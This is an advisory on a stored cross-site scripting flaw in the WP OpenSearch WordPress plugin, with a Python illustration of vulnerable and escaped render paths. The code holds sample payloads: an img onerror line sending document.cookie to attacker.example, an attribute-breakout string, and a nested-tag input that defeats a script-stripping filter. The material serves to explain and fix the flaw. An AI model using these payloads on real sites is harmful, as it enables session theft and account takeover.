Impact
The plugin allows an attacker to store malicious script in content that the site later renders, so the script executes in the browser of every visitor who loads a page displaying that content. Because the injected JavaScript runs in the site's own origin, it can read session cookies or tokens that are not protected by the HttpOnly flag, perform actions with the victim's privileges (administrative actions if the victim is an administrator), deface displayed content, or redirect users to attacker-controlled domains. The impact is a loss of confidentiality and integrity for any user of the site, and the same foothold can be used to serve malware or phishing pages.
Affected Systems
The vulnerability affects the WP OpenSearch WordPress plugin in every version from the initial release up to and including 1.0. The plugin is distributed through the WordPress plugin repository under the author name sav.
Risk and Exploitability
The CVSS base score is 7.1 (high). The EPSS score is below 1%, indicating a low estimated probability of exploitation in the wild over the next 30 days, and the flaw is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Because the vulnerability is a stored XSS, an attacker exploits it by submitting input through the site's content-creation interface that the plugin persists and later renders without adequate escaping; the payload then fires for every visitor who loads the affected page, with no further action from the attacker and no need to be on the same network. The only prerequisite is whatever access the site grants to that interface, so sites that accept content from low-privileged or untrusted users are the most exposed. The base score and EPSS estimate do not account for site-specific factors such as which roles may submit content or whether a Content Security Policy is deployed.
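The store-then-render mechanism described above, as an added illustration that is not code from the WP OpenSearch plugin or from this advisory. It models the plugin's persisted content with an in-memory dictionary, shows a vulnerable render path beside an output-escaped one for both an HTML text context and an attribute context, and includes a check a reviewer can use to decide whether a rendered page still delivers active content. The payloads are constructed samples; the mapping of html.escape() to the WordPress helpers esc_html() and esc_attr() is an assumption about how a fix would typically be written in PHP, since the advisory does not show the plugin's code.

```python
import html

# Constructed in-memory store standing in for the plugin's persisted content.
# Stored XSS means the payload survives storage verbatim and only fires when a
# page renders it for a visitor, so the storage step itself is not the bug.
_STORE: dict[str, str] = {}

# Constructed sample payloads (not taken from the advisory): one for an HTML
# text context, one that breaks out of a quoted attribute without using a tag.
TEXT_PAYLOAD = '<img src=x onerror="document.location=\'https://attacker.example/?c=\'+document.cookie">'
ATTR_PAYLOAD = '" autofocus onfocus="alert(document.domain)'


def store_content(key: str, raw: str) -> None:
    """Persist user-supplied content exactly as received (the storage step)."""
    _STORE[key] = raw


def render_vulnerable(key: str) -> str:
    """Vulnerable render: stored content is concatenated into HTML unescaped."""
    return f'<div class="search-result">{_STORE[key]}</div>'


def render_attr_vulnerable(key: str) -> str:
    """Same bug in an attribute context: the stored value lands inside value="...".
    No tag is needed to exploit this; a bare double quote is enough."""
    return f'<input type="text" name="q" value="{_STORE[key]}">'


def render_safe(key: str) -> str:
    """Hardened render: escape at output time, for the context being emitted into.
    html.escape(quote=True) plays the role of WordPress esc_html() here
    (assumption: the plugin's fix would use that helper)."""
    return f'<div class="search-result">{html.escape(_STORE[key], quote=True)}</div>'


def render_attr_safe(key: str) -> str:
    """Attribute context hardened the same way (WordPress: esc_attr(), assumed)."""
    return f'<input type="text" name="q" value="{html.escape(_STORE[key], quote=True)}">'


def naive_strip_script(raw: str) -> str:
    """Filter-on-input approach people reach for first: delete <script> tags.
    Included only to show why it is not a fix: a single pass removes the inner
    tag and reassembles a new one from the fragments around it."""
    return raw.replace("<script>", "").replace("</script>", "")


DANGEROUS = ("<", ">", '"', "'")


def delivers_active_content(rendered: str, untrusted: str) -> bool:
    """Exploitability check: the untrusted value appears verbatim in the rendered
    HTML and still carries a delimiter that can change how the page is parsed
    (tag brackets for a text context, quotes for an attribute context)."""
    return untrusted in rendered and any(ch in untrusted for ch in DANGEROUS)


def demo() -> dict[str, bool]:
    """Run every render path against the constructed payloads; True = exploitable."""
    store_content("result-1", TEXT_PAYLOAD)
    store_content("result-2", ATTR_PAYLOAD)
    # Nested-tag input that survives the strip filter as a plain <script> tag.
    store_content("result-3", naive_strip_script("<scr<script>ipt>alert(1)</scr</script>ipt>"))
    return {
        "text_vulnerable": delivers_active_content(render_vulnerable("result-1"), TEXT_PAYLOAD),
        "text_safe": delivers_active_content(render_safe("result-1"), TEXT_PAYLOAD),
        "attr_vulnerable": delivers_active_content(render_attr_vulnerable("result-2"), ATTR_PAYLOAD),
        "attr_safe": delivers_active_content(render_attr_safe("result-2"), ATTR_PAYLOAD),
        "strip_filter_bypassed": delivers_active_content(
            render_vulnerable("result-3"), "<script>alert(1)</script>"
        ),
    }


if __name__ == "__main__":
    for name, exploitable in demo().items():
        print(f"{name:22s} exploitable={exploitable}")
```

The design point is that the fix belongs at output, chosen per context, not at input: the same stored string is harmless through render_safe() and render_attr_safe() while any filter applied before storage has to anticipate every encoding and nesting trick, and the stripped-script case shows a standard one it misses.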